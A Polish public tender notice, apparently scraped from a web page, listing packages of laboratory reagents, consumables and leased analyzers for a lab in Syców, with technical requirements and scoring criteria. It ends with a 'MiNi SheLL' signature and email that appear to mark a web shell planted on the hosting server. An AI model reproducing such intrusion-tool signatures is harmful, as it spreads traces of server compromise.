W przypadku materiałów kontrolnych do Białka w moczu (poz 26 zestawienia) Wykonawca uwzględni wykonywanie kontroli 2 razy w tygodniu 
na 2 poziomach.
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. 
W przypadku nie uwzględnienia
asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu 
Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.

3. Materiały zużywalne i eksploatacyjne

Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. 
W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego 
zapewnienia tego asortymentu Zamawiającemu. 
Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.
W tabeli 3 (Materiały zużywalne i eksploatacyjne) Wykonawca uwzględni koszt podłączenia i konfiguracji analizatora do laboratoryjnego 
systemu informatycznego (LIS) E-LAB firmy Eclipse.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena parametrów technicznych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 - Odczynniki i materiały zużywalne do badań immunochemicznych wraz dzierżawą analizatora dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator: 
Analizator w pełni automatyczny umożliwiający wykonywanie analiz w trybie pacjent po pacjencie oraz wykonywanie analiz w trybie pilnym bez konieczności zatrzymywania pracy analizatora.
Wydajność analizatora minimum 90 analiz na godzinę
Możliwość wstawienia do analizatora materiału badanego w probówkach pierwotnych z zastosowaniem kodów kreskowych.
Wszystkie oferowane odczynniki, kalibratory, kontrole i bufory w stanie płynnym gotowe do natychmiastowego użycia.
Możliwość dostawiania próbek, kalibratorów, materiału kontrolnego oraz odczynników w trakcie pracy analizatora.
Identyfikacja odczynników za pomocą kodów kreskowych z monitorowaniem ilości odczynników w opakowaniu.

Automatyczne otwieranie i zamykanie zestawów odczynnikowych w rotorze odczynnikowym w celu eliminacji parowania odczynników.
System dozujący próbki badane zapewniający przenoszenie materiału z próbki na próbkę (kontaminację) mniejsze niż 1 ppm.
Niespełnienie któregoś z warunków granicznych powoduje odrzucenie oferty.

1. Odczynniki								
1. HBsAg - ilość: 1200 ozn.	 	 	 	 	 	 
2. hTSH (ultra) - ilość: 6000 ozn.	 	 	 	 	 	 

Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania.
Przy obliczaniu ilości potrzebnych opakowań odczynników do podanych wyżej ilości oznaczeń należy doliczyć niezbędne oznaczenia kalibracyjne.
									
2. Materiały zużywalne
								
3. Materiały kontrolne i kalibrator

podpis osoby upoważnionej do reprezentowania firmy



Ocena techniczno-użytkowa

Kryteria oceny parametrów technicznych odczynników i analizatora.
1. Oznaczenia wolnych hormonów tarczycy w oparciu o reakcje 2-stopniowe z przemywaniem próbki po każdym etapie reakcji tj. przed dodaniem koniugatu i przed dodaniem substratu
Nie 0 pkt
Tak 4 pkt	
2. Możliwość stosowania automatycznych powtórek analiz, funkcji Reflex Test oraz automatycznych rozcieńczeń dla oznaczeń.
Nie 0 pkt
Tak 2 pkt	
3. Wykrywanie oferowanym testem HBsAg minimum 12 różnych mutacji wirusa HBV - w celu potwierdzenia należy umieścić w tabeli odwołanie do publikacji w literaturze fachowej
Nie 0 pkt
Tak 8 pkt	
4. System dozowania próbek i odczynników nie wymagający użycia dodatkowych jednorazowych końcówek dozujących.
Nie 0 pkt
Tak 6 pkt	
Oferent ma obowiązek przedstawienia w ofercie dokumentacji, na podstawie której Zamawiający dokona oceny przedstawionych parametrów analizatora i odczynników.
Wykonawca uwzględni koszt podłączenia i konfiguracji analizatora do laboratoryjnego systemu informatycznego (LIS) E-LAB firmy Eclipse.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. ocena parametrów technicznych i jakościowych analizatora, odczynników oraz serwis - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 - Odczynniki i materiały zużywalne do badań biochemicznych wraz dzierżawą analizatora dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator:
   Warunki bezwzględnie wymagane przez Zamawiającego dotyczące analizatora biochemicznego
2
Wieloparametrowy analizator biochemiczny fabrycznie nowy , rok  prod. 2010, wyklucza się analizator demonstracyjny .
Analizatory typu ,, bench top ,,  do postawienia na stole 
Analizator pracujący w systemie odczynnikowym i aplikacyjnym  całkowicie otwartym .
Wydajność części fotometrycznej  analizatora minimum  240 testów /godzinę .
Analizator pracujący z wykorzystaniem kuwet pomiarowych wielokrotnego użytku .
Kuwety myte  przez stację mycia kuwet zintegrowaną z analizatorem.
Analizator pracujący bez zewnętrznej stacji uzdatniania wody.
Małe  zużycie wody  nie więcej niż  4 l /godz. pracy analizatora
Oddzielanie ścieków skondensowanych (zakaźnych) od pozostałych .
Analizator pracujący  w zakresie dł. fali 340-800 nm.
Chłodzenie odczynników na pokładzie analizatora  niezależnie od temp. otoczenia .
Rotor  próbkowy  analizatora :
 minimum   50 pozycji 
Rotor odczynnikowy  analizatora :
 minimum 35 pozycji dwuodczynnikowych  
Kuwety pomiarowe termostatowane do 37°C bez łaźni wodnej.
Analizator wyposażony w zewnętrzną jednostkę sterującą : komputer zewnętrzny - oprogramowanie  Windows 2000, XP lub nowszy, zewnętrzny monitor  typu LCD , zewnętrzną drukarkę laserową , UPS
Możliwość oznaczania :
enzymów ,
substratów ,
białek specyficznych  , 
monitorowanie leków.
Program kontroli jakości badań z liczbową
 i graficzną prezentacją wyników - 
wykresy Levey -Jenningsa 
Możliwość programowania próbek ,,cito,, w dowolnym momencie pracy analizatora - nie mniej niż 5 pozycji ,,cito,, w rotorze próbkowym .
Mieszanie mieszaniny reakcyjnej bez ryzyka kontaminacji - mieszanie pneumatyczne 
Niezależny system pipetujący dla odczynników oraz dla próbek : 
- dwie niezależne igły odczynnikowe
- niezależna igła próbkowa
Opcja  automatycznego  powtarzania analiz po przekroczeniu zakresu liniowości
Opcja automatycznego  rozcieńczania próbek
Możliwość barkodowej identyfikacji próbek i odczynników za pomocą wbudowanego w analizator czytnika kodów paskowych
Możliwość zastosowania próbki badanej w kubeczkach lub probówkach pierwotnych
Oprogramowanie analizatora  w języku polskim
Bezpłatny serwis w czasie trwania umowy
Materiały informacyjne z parametrami technicznymi oferowanego aparatu z których wynika spełnienie parametrów wymaganych dołączone do oferty przetargowej .

Oferowane urządzenie musi posiadać parametry techniczne nie gorsze niż wymagane przez  Zamawiającego oraz posiadać cechy użytkowe wymagane przez Zamawiającego.
Nie spełnienie któregokolwiek z wymaganych parametrów - brak potwierdzenia TAK w kolumnie nr 3 lub brak opisu w kolumnie nr 4 spowoduje odrzucenie oferty. 

1. Odczynniki
1. Glukoza - ilość: 13 600
2. Cholesterol - ilość: 10 800
3. Cholesterol HDL(bezpośredni) - ilość: 9 000
4. Trójglicerydy - ilość: 9 000
5. Białko całkowite - ilość: 160
6. Bilirubina całkowita - ilość: 1 400
7. Mocznik - ilość: 7 000
8. Kreatynina: 9 600
9. Kwas moczowy: 1 360
10. Amylaza - ilość: 700
11. Aminotransferaza asparaginowa - ilość: 5 000
12. Aminotransferaza alaninowa - ilość: 7 000
13. GGTP - ilość: 1 600
14. Fosfataza alkaiczna - ilość: 400
15. Wapń - ilość: 600
16. Magnez - ilość: 980
17. Fosfor - ilość: 80
18. Żelazo - ilość: 1 700
19. CRP - ilość: 3 300
20. RF - ilość: 960
21. ASO - ilość: 460

Wszystkie odczynniki w opakowaniach umożliwiających ich bezpośrednie wstawienie na pokład analizatora bez konieczności ich przelewania 
poza analizatorem.											
W przypadku niepodzielności ilości testów w opakowaniu zaokrąglić w górę do pełnego opakowania .				
Podane ilości opakowań z uwzględnieniem terminu trwałości na pokładzie analizatora po ich otwarciu.
Instrukcje odczynnikowe wraz z aplikacjami na oferowany analizator  w formie pisanej dołączone do oferty przetargowej.
Wszystkie odczynniki , kontrole , kalibratory muszą pochodzić od jednego producenta
Wykonawca uwzględni koszt podłączenia i konfiguracji analizatora do laboratoryjnego systemu informatycznego (LIS) E-LAB firmy Eclipse.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6 - Odczynniki i materiały zużywalne do oznaczania poziomu troponiny wraz dzierżawą analizatora dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator: 
Analizator wykonujący ilościowe oznaczenia Troponiny
W pełni przenośny
Wyposażony w dotykowy ekran
Zasilanie sieciowe i bateryjne wystarczające na wykonanie minimum 10 pomiarów
Aparat ze zintegrowanym czytnikiem kodów kreskowych
Mała objętość próbki - do 150 
Testy paskowe z polem potwierdzajacym poprawność wykonania oznaczenia
Możliwość wykonania badań z pełnej krwi żylnej pobranej na heparynę sodową lub litową
Oznaczenie parametru w czasie do 15 minut
Pamięć 500 wyników pacjentów z datą i czasem pomiaru
Pomiar immunochemiczny
Zastosowanie jednorazowych testów paskowych, oddzielnie pakowanych
Testy paskowe gotowe do użycia zaraz po wyjęciu z lodówki
Elektroniczny klucz kodujący kalibrację w każdym opakowaniu testów
Niespełnienie choćby jednego wymaganego parametru spowoduje odrzucenie oferty.

1.	Odczynniki
Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania.
1. Troponina: ilość oznaczeń - 1600

2. Materiały zużywalne

3. Materiały kontrolne

Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu.
Wykonawca uwzględni koszt podłączenia i konfiguracji analizatora do laboratoryjnego systemu informatycznego (LIS) E-LAB firmy Eclipse.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7 - Odczynniki i materiały zużywalne do oznaczania elektrolitów wraz dzierżawą analizatora dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator:
określenie parametru
Możliwość oznaczania: Na , K , Cl
Kalibracja automatyczna lub na żądanie
Odczynniki kalibracyjne i pojemnik na ścieki w zamkniętym pakiecie
Żywotność pakietu po instalacji w aparacie minimum 60 dni 
Bezobsługowe elektrody  
Objętość próbki maksymalnie 60 ?l
Detektor pęcherzyków
Czas pomiaru do 35 sekund
Oprogramowanie analizatora i instrukcja obsługi w języku polskim
System kontroli jakości - na 3 poziomach
Czytnik barkodów w zestawie z aparatem
Rok produkcji aparatu - nie starszy niż 2010
Niespełnienie choćby jednego wymaganego parametru spowoduje odrzucenie oferty.

1. Odczynniki	
1. Sód - ilość: 10000 ozn.
2. Potas - ilość: 10000 ozn.
3. Chlorki - ilość: 100 ozn.

Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość opakowań i zaokrąglając w górę do pełnego opakowania.
Przy obliczaniu ilości potrzebnych opakowań odczynników do podanych wyżej ilości oznaczeń należy doliczyć niezbędne oznaczenia kalibracyjne.

2. Materiały zużywalne

3. Materiały kontrolne i kalibratory

Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający do prawidłowego wykonania w/w ilości oznaczeń. W przypadku nie uwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do Zamawiającego.
Wykonawca uwzględni koszt podłączenia i konfiguracji analizatora do laboratoryjnego systemu informatycznego (LIS) E-LAB firmy Eclipse.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8 - Podłoża płynne do posiewów krwi i płynów ustrojowych do automatycznego systemu do hodowli drobnoustrojów oraz dzierżawa automatycznego systemu do posiewów krwi i płynów ustrojowych dla laboratorium w Sycowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat:
Opis parametru granicznego
Ilość miejsc inkubacyjno-pomiarowych w aparacie  50-60
Odczyt badanych (monitorowanych) próbek w aparacie poprzez system fotodetektorów min. co 10 minut
Wprowadzanie danych o numerze badania czytnikiem kodów paskowych (dostępna opcja wprowadzania butelek z uszkodzonym kodem kreskowym)
Natychmiastowa sygnalizacja próby dodatniej-sygnał dźwiękowy i świetlny
Zmiana czasu inkubacji na życzenie operatora 
a.	dla danego rodzaju podłoża
b.	dla pojedynczej butelki
Dostępne podłoża standardowe do hodowli drobnoustrojów tlenowych oraz beztlenowych
Dostępne podłoża do hodowli drobnoustrojów w próbkach pacjentów poddanych antybiotykoterapii-podłoża z inhibitorem stosowanych antybiotyków
Dostępne podłoża do hodowli i detekcji wzrostu drobnoustrojów w próbkach pediatrycznych oraz płynie mózgowo-rdzeniowym (mała ilość materiału-  0,5-5 ml) - dołączyć materiały informacyjne producenta
Dostępne podłoża do hodowli i detekcji wzrostu drobnoustrojów sfagocytowanych - podłoża dla drobnoustrojów beztlenowych z czynnikiem lizującym umożliwiającym uwolnienie drobnoustrojów z leukocytów oraz neutralizującym wpływ elementów morfotycznych krwi na wyniki fałszywie dodatnie - dołączyć insert z opakowania producenta
Możliwość hodowli drożdżaków i grzybów na wybiórczych podłożach z antybiotykami hamującymi wzrost bakterii( zminimalizowanie czasu hodowli tych drobnoustrojów-nawet do 44h- możliwość wykrycie równolegle przebiegającej bakteriemii i fungemii)
Podłoża dostosowane do próżniowego pobierania krwi bezpośrednio do butelek za pomocą specjalnych zestawów - (uchwyt + wężyk + igła motylkowa) - kompatybilność butelek z systemami próżniowymi pobierania krwi dostępnymi na ryku ( brak konieczności stosowania przekładek, adapterów)
Możliwość opóźnionego wkładania butelek do aparatu (do 48h) bez uszczerbku na wykrywalności drobnoustrojów-dołączyć deklarację producenta 
Możliwość wdrożenia procedury inokulacji testów do identyfikacji oraz oceny lekowrażliwości bezpośrednio z pozytywnych podłoży hodowlanych- dołączyć procedurę producenta 
Podłoża do systemu z możliwością przechowywania w temperaturze pokojowej 
Aparat wyposażony w UPS stabilizujący napięcie w przypadku awarii sieci energetycznej
Bezpłatne przeprowadzenie szkoleń personelu z obsługi aparatu po instalacji 
Instrukcja obsługi urządzenia oraz opisy podłoża w j. polskim wraz z dostawą aparatu
Niespełnienie choćby jednego wymaganego parametru spowoduje odrzucenie oferty.

1. Podłoża do hodowli tlenowej - ilość: 500 butelek
2. Podłoża do hodowli beztlenowej - ilość: 300 butelek
3. Podłoża do hodowli tlenowej z inhibitorem antybiotyku - ilość: 100 butelek
4. Podłoża do hodowli beztlenowej z inhibitorem antybiotyku	- ilość: 50 butelek
5. Podłoża pediatryczne - ilość: 200 butelek
6. Podłoża selektywne do hodowli grzybów z inhibitorem wzrostu bakterii - ilość: 100 butelek
7. Podłoża z czynnikiem lizującym dla drobnoustrojów beztlenowych - ilość: 50 butelek
Wykonawca uwzględni koszt podłączenia i konfiguracji analizatora do laboratoryjnego systemu informatycznego (LIS) E-LAB firmy Eclipse.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9 -  Materiały do wykonywania badań z zakresu mikrobiologii dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Test do wykrywania rotawirusów i adenowirusów. Kasetkowy, jakościowy test immunochromatograficzny. Jednoczesne wykrycie rotawirusów i adenowirusów. Kasetki pakowane pojedynczo. Czas otrzymania wyniku do 15 minut. Wewnętrzna kontrola zawarta w teście.
ilość: 800 szt.
2. Probówki sterylne do wymazów, transportowe z podłożem Stuarta.
ilość: 2 500 szt.
3. Pożywki do posiewu moczu, dwupodłożowe: agar C.L.E.D. , oraz agar Mac Conkeya
ilość: 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com